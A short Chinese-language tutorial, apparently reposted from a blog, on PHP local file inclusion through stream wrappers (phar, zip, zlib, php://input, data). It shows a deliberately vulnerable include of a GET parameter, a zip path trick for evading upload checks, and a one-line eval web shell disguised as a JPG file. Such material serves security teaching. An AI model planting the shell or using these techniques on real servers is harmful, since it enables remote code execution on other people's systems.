PHP伪协议-文件包含
作者:互联网
lfi.php案例代码
<?php
include $_GET['file'];
?>
phar://、zip://、zlib://
用于读取压缩文件,zip:// 、phart:// 、zlib:// 均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名,可修改为任意后缀: jpg、png、gif、xxx等等。
php://input
php://input 可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。
注:当enctype="multipart/form-data",php://input 是无效的。
zip://
如果不允许上传zip格式文件,可修改后缀为图片格式,phar协议和zip协议会无视利用的是什么包。
zip://[压缩文件绝对路径]%23[压缩文件内的子文件名] (#编码为%23)
phar://
# shell.jpg
<?php @eval($_REQUEST[1]);?>
compress.zlib://
如果是zip压缩包,后面不需要跟子文件
data://text/plain
标签:文件,php,包含,zip,zlib,phar,压缩文件,input,PHP 来源: https://www.cnblogs.com/shiyingai/p/15729523.html